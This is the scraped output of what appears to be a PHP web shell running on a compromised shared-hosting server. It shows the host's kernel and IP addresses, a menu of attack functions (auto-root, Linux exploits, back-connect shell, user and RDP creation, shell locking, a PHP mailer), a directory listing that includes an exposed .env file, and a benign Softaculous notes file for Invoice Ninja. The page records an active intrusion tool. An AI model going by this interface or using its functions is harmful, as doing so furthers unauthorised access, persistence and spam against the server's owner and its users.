Linux server123.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.126.127 | : 216.73.216.107
Cant Read [ /etc/named.conf ]
?8.4.14
ezdajrnh
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
ninja4 /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
.env
518
B
-rw-r--r--
.htaccess
6.09
KB
-rw-r--r--
clone.php
6.47
KB
-rw-r--r--
edit.php
4.25
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
extend.php
8.97
KB
-rw-r--r--
fileindex.php
418
B
-rw-r--r--
import.php
4.69
KB
-rw-r--r--
info.xml
4.56
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
7.54
KB
-rw-r--r--
install.xml
1016
B
-rw-r--r--
md5
1.26
KB
-rw-r--r--
notes.txt
1.22
KB
-rw-r--r--
remove.php
2.09
KB
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
upgrade.php
4.6
KB
-rw-r--r--
upgrade.xml
302
B
-rw-r--r--
version.txt
6
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
1. Set the debug to false in .env 2. Do not use same upgrade method when there is change in database. Ask vendor for upgrade utility.(from version 1.5.1 vendor provides script's upgrade utility) 3. We have changed the password function so please check login before launching the next version 4. Set the APP_ENV to production in .env 5. /public should be there in APP_URL in .env 6. Do not edit compiled.php for \r \n because dreamviewer is unable to edit the file properly 7. Add the following line to the .htaccess file in the root folder : <IfModule mod_alias.c> RedirectMatch 301 ^[[relativeurl]]/$ [[softurl]]/public </IfModule> 8. PHP REQUIREMENT LINK : https://docs.invoiceninja.com/install.html (Vendor has asked us to keep PHP requirement 7.1 and he will update requirement on his website) and also check /vendor/composer/platform_check.php/ (also check extension list from this file in every version i.e $missingExtensions array and add to our info.xml, if any extension from the array is not present in our info.xml) 9. Release date : https://github.com/invoiceninja/invoiceninja/releases 10. We exclude logo image path while upgrade i.e public/images/invoiceninja-logo.png since user's custom logo was getting overwritten post upgrade.
Close